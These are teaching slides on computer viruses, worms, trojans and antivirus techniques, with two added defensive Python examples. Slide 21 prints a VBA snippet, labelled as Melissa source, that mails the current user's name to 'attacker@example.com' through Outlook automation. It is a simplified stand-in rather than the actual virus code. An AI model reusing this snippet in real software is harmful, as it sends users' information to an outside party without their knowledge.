Computer Viruses and Intrusions





  1. Computer Viruses and Intrusions • introduction to computer viruses • types of hacker intrusion and terminology • intrusion detection systems

  2. Viruses and Other Malicious Content • computer viruses have had a lot of publicity • one of a family of malicious software • effects usually obvious • have figured in news reports, fiction, movies (often exaggerated) • get more attention than they deserve • are nonetheless a real concern

  3. Malicious Software

  4. Trapdoors • secret entry point into a program • allows those who know of it to gain access, bypassing the usual security procedures • have been commonly used by developers • a threat when left in production programs, where attackers can exploit them • very hard for the O/S to block • requires good software development and update practices

  5. Logic Bomb • one of the oldest types of malicious software • code embedded in a legitimate program • activated when specified conditions are met • e.g. presence/absence of some file • particular date/time • particular user • when triggered, typically damages the system • modifies/deletes files/disks

  6. Trojan Horse • program with hidden side-effects • usually superficially attractive • e.g. game, s/w upgrade, etc. • when run, performs some additional tasks • allows the attacker to indirectly gain access they do not have directly • often used to propagate a virus/worm or install a backdoor • or simply to destroy data

  7. Zombie • program which secretly takes over another networked computer • then uses it to indirectly launch attacks • often used to launch distributed denial of service (DDoS) attacks • exploits known flaws in network systems

  8. Viruses • a piece of self-replicating code attached to some other code • cf biological virus • both propagates itself & carries a payload • carries code to make copies of itself • as well as code to perform some covert task

  9. Comparison table of malicious programs

  10. What is a computer virus • a special kind of computer program • self-replicating; lies dormant, then activates • origin of viruses: the Pakistani brothers taking matters into their own hands • viruses, Internet worms, Trojan horses, backdoors

  11. Infection vectors • floppy disks, CDs • network • BBS • FTP • E-Mail • Network Neighborhood (Windows file sharing)

  12. Virus types - 1 • boot-sector type: lurks in the disk boot area • e.g. Michelangelo, triggers on 3/6 and formats the hard disk • e.g. the Monkey virus, corrupts the hard disk partition table • file-infecting type: lurks in executable files • e.g. Friday the 13th, triggers on Friday the 13th and deletes every executable on the hard disk • e.g. the "slot machine" virus (吃角子老虎), triggers on the 15th of January, April and August and gives five bets to win back the data on the hard disk

  13. Virus types - 2 • macro type: written in Office macros • e.g. Taiwan No.1, triggers on the 13th, plays rock-paper-scissors and opens 20 blank documents • e.g. the A-Bian virus, displays the slogan "有夢最美﹐希望相隨" (dreams are most beautiful, hope follows along) • multipartite type: both boot-sector and file-infecting • network viruses: use the network to spread further • e.g. the Melissa virus

  14. Anti-virus measures - 1 • do not use pirated software or software of unknown origin • disable/configure Word macro security • disable shared network resources • set the machine to boot from the hard disk to avoid boot-sector infection; the BIOS can also enable virus protection • install anti-virus software and update the virus signatures regularly, or use the anti-virus vendor's push technology

  15. Anti-virus measures - 2 • prepare an emergency boot disk for rescue when infected • keep floppy disks write-protected normally • handle executables downloaded from the network and e-mail attachments with special care • Back up!! Back up!! Back up!!

  16. Executable file types on Windows • binaries (.exe and .com) • batch files (.bat) • VBScript files (.vbs) • JAR files (.jar)

  17. Handling an infection • shut down immediately • reboot from a clean boot disk • scan, quarantine, disinfect • check other disks

  18. Worms • replicating but not infecting program • typically spreads over a network • cf. the Morris Internet Worm of 1988 • led to the creation of CERTs • spreads using users' distributed privileges or by exploiting system vulnerabilities • widely used by hackers to create zombie PCs, subsequently used for further attacks, especially DoS • major issue is the lack of security of permanently connected systems, especially PCs

  19. Worm Operation • worm phases like those of viruses: • dormant • propagation • search for other systems to infect • establish a connection to the target remote system • replicate self onto the remote system • triggering • execution

  20. Recent Worm Attacks • new spate of attacks from mid-2001 • Code Red • exploited a bug in MS IIS to penetrate and spread • probes random IPs for systems running IIS • had a trigger time for a denial-of-service attack • 2nd wave infected 360,000 servers in 14 hours • Code Red 2 • had a backdoor installed to allow remote control • Nimda • used multiple infection mechanisms • email, shares, web client, IIS, Code Red 2 backdoor

  21. Network virus case study - Melissa • the e-mail subject is "An important message from <sender name>", and the message body is "Here is that document you asked for …don't show anyone else;-)." • Source code:
      Set UngaDasOutlook = CreateObject("Outlook.Application")     ' attach to the user's Outlook
      Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
      If UngaDasOutlook = "Outlook" Then
          DasMapiName.Logon "profile", "password"
          Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)      ' 0 = mail item
          BreakUmOffASlice.Recipients.Add "attacker@example.com"   ' recipient address must be a string
          BreakUmOffASlice.Subject = "Important Message From " & Application.CurrentUser
          BreakUmOffASlice.Send
          DasMapiName.Logoff
      End If

  22. Network virus case study - Nimda • propagation paths • e-mail • Network Neighborhood (file shares) • web sites • Reference: www.symantec.com

  23. Network virus case study – I Love You • subject: I LOVEYOU, attachment: LOVE-LETTER-FOR-YOU.txt.vbs • infects *.mp3, *.vbs, *.jpg, *.jpeg, *.hta, *.vbe… and renames them to *.vbs • What's VBS: msgbox "Click OK to reformat hard drive."

  24. Types of hacker intrusion - 1

  25. Buffer overflow example • If you selected the NFS Server item when first installing Red Hat Linux, then in principle the two important daemons rpc.mountd and rpc.nfsd start automatically with Linux, and you probably only need to edit the /etc/exports file to share file resources over NFS. An intruder can exploit a buffer overflow vulnerability in these versions of mountd to obtain administrator privileges. As long as the mountd program is running, the system can be compromised whether or not any files are exported. Systems currently confirmed to have this vulnerability: all versions of Red Hat Linux.

  26. Types of hacker intrusion - 2

  27. Trojan horse: Back Orifice 2000 • reboot the victim machine. • lock up the victim machine. • grab all network passwords from the password cache. • obtain machine information, such as processor speed, memory and disk space. • record every keystroke typed on the machine and review them at any time. • display system message windows. • redirect system ports to other IP addresses and ports. • add or remove Microsoft network shared resources. • map or unmap network resources. • start, kill and list system processes, including closing programs the user is running. • full rights to edit and view the user's registry. • play selected sound files on the victim machine. • capture the user's screen. • list whether any video capture devices, such as digital cameras, are installed on the machine; if so, the hacker can use them to capture video or still images, which lets the hacker watch the victim's room directly. • full access and edit rights to the user's hard disk. • shut down the BO2K server component and remove itself completely from the system.

  28. Types of hacker intrusion - 3

  29. Mobile code security • macro language VBA • JavaScript • VBScript • Java Applet • ActiveX controls

  30. Actions restricted in VBScript • file I/O • Dynamic Data Exchange (DDE) • object instantiation • direct database access (DAO) • executing DDL

  31. Virus Countermeasures • viral attacks exploit the lack of integrity control on systems • to defend, need to add such controls • typically by one or more of: • prevention - block the virus infection mechanism • detection - of viruses in an infected system • reaction - restoring the system to a clean state

  32. Anti-Virus Software • first-generation • scanner uses virus signatures to identify a virus • or a change in the length of programs • second-generation • uses heuristic rules to spot viral infection • or uses program checksums to spot changes • third-generation • memory-resident programs identify a virus by its actions • fourth-generation • packages with a variety of antivirus techniques • e.g. scanning, activity traps, access controls
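A worked illustration of the integrity controls of slide 31 and the first- and second-generation checks of slide 32 (signature matching, program-length change, checksum comparison), added here as an example and not taken from the slides; the file images, paths and "virus signatures" are constructed for the demonstration:

```python
# Added example (not from the slides): signature scan plus length/checksum
# integrity check over an in-memory "disk" of executables; all data is constructed.
import hashlib

# Constructed signatures: byte patterns a first-generation scanner looks for.
SIGNATURES = {
    "DemoVirus.A": b"\xeb\x1a\x90DEMO-VIRUS-A",
    "DemoVirus.B": b"VIRUS-B-MARK\x00",
}

def signature_scan(data: bytes, signatures: dict = SIGNATURES) -> list:
    """First generation: report every known signature found in the file image."""
    return sorted(name for name, pat in signatures.items() if pat in data)

def build_baseline(files: dict) -> dict:
    """Second generation: record length and SHA-256 of each known-clean program."""
    return {path: (len(data), hashlib.sha256(data).hexdigest())
            for path, data in files.items()}

def check_integrity(files: dict, baseline: dict) -> dict:
    """Compare current files with the baseline and classify each difference."""
    findings = {}
    for path, data in files.items():
        if path not in baseline:
            findings[path] = "new file (no baseline)"
            continue
        old_len, old_hash = baseline[path]
        new_hash = hashlib.sha256(data).hexdigest()
        if new_hash == old_hash:
            continue
        if len(data) != old_len:
            findings[path] = f"length changed {old_len}->{len(data)}"  # growth typical of appended viral code
        else:
            findings[path] = "contents changed, same length"  # checksum catches what a length check misses
    for path in baseline.keys() - files.keys():
        findings[path] = "missing"
    return findings

# Constructed sample: clean programs, then one infected by appending, one patched in place.
CLEAN = {"C:/APP/EDIT.EXE": b"MZ" + b"\x90" * 60, "C:/APP/GAME.EXE": b"MZ" + b"\xcc" * 40}
BASELINE = build_baseline(CLEAN)
INFECTED = dict(CLEAN)
INFECTED["C:/APP/EDIT.EXE"] = CLEAN["C:/APP/EDIT.EXE"] + SIGNATURES["DemoVirus.A"]
INFECTED["C:/APP/GAME.EXE"] = b"MZ" + b"\xcc" * 20 + b"VIRUS-B-MARK\x00" + b"\xcc" * 7

if __name__ == "__main__":
    for path, data in INFECTED.items():
        print(path, signature_scan(data), check_integrity(INFECTED, BASELINE).get(path))
```

The second sample file keeps its original length, so only the checksum (not the length check) reveals the modification, which is why the slide lists checksums as the stronger second-generation control.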

  33. Advanced Anti-Virus Techniques • generic decryption • use a CPU simulator to check program signature and behavior before actually running it • digital immune system (IBM) • general-purpose emulation and virus detection • any virus entering the org is captured, analyzed, detection/shielding created for it, then removed

  34. Behavior-Blocking Software • integrated with the host O/S • monitors program behavior in real time • e.g. file access, disk format, executable modifications, system settings changes, network access • for possibly malicious actions • if detected can block, terminate, or seek user confirmation • has an advantage over scanners • but the malicious code runs before detection
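An added example, not from the slides, of how a behaviour blocker of the kind slide 34 describes could classify the actions it lists (executable modification, disk format, system settings changes, network access): the policy rules, process ids, event trace and the decision names ALLOW/ASK/BLOCK/TERMINATE are all constructed for this illustration:

```python
# Added example (not from the slides): a toy behaviour blocker that evaluates a
# process's runtime actions against a small constructed policy, event by event.
from collections import defaultdict

EXECUTABLE_EXT = (".exe", ".com", ".bat", ".vbs", ".jar")  # executable types from slide 16

def decide(event: dict, state: dict) -> str:
    """Return the decision for one event, updating per-process counters in state."""
    kind = event["action"]
    if kind == "disk_format":                      # never legitimate for an ordinary program
        return "TERMINATE"
    if kind == "file_write" and event["path"].lower().endswith(EXECUTABLE_EXT):
        state["exe_writes"] += 1                   # executable modification: ask first, stop a spree
        return "TERMINATE" if state["exe_writes"] >= 3 else "ASK"
    if kind == "registry_write" and event["key"].lower().endswith(r"\run"):
        return "ASK"                               # persistence via system settings
    if kind == "network_connect" and event.get("port") in (25, 587):
        state["smtp"] += 1                         # mass-mailing pattern (cf. Melissa on slide 21)
        return "BLOCK" if state["smtp"] > 1 else "ASK"
    return "ALLOW"

def monitor(events: list) -> list:
    """Run the policy over an ordered event trace; a terminated process gets no further events."""
    states = defaultdict(lambda: {"exe_writes": 0, "smtp": 0})
    dead = set()
    out = []
    for ev in events:
        pid = ev["pid"]
        if pid in dead:
            continue
        d = decide(ev, states[pid])
        out.append((pid, ev["action"], d))
        if d == "TERMINATE":
            dead.add(pid)
    return out

# Constructed trace: pid 7 behaves like a file infector, pid 9 like a normal editor.
TRACE = [
    {"pid": 9, "action": "file_write", "path": "C:\\DOCS\\NOTES.TXT"},
    {"pid": 7, "action": "file_write", "path": "C:\\APP\\EDIT.EXE"},
    {"pid": 7, "action": "file_write", "path": "C:\\APP\\GAME.EXE"},
    {"pid": 7, "action": "network_connect", "host": "mail.example.com", "port": 25},
    {"pid": 7, "action": "file_write", "path": "C:\\WINDOWS\\CALC.EXE"},
    {"pid": 7, "action": "disk_format", "drive": "C:"},   # never evaluated: pid 7 already terminated
    {"pid": 9, "action": "registry_write", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
]
```

Calling `monitor(TRACE)` shows the slide's caveat in action: pid 7 has already touched two executables and opened a mail connection before the third executable write gets it terminated, so the blocker limits damage rather than preventing the first malicious action.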
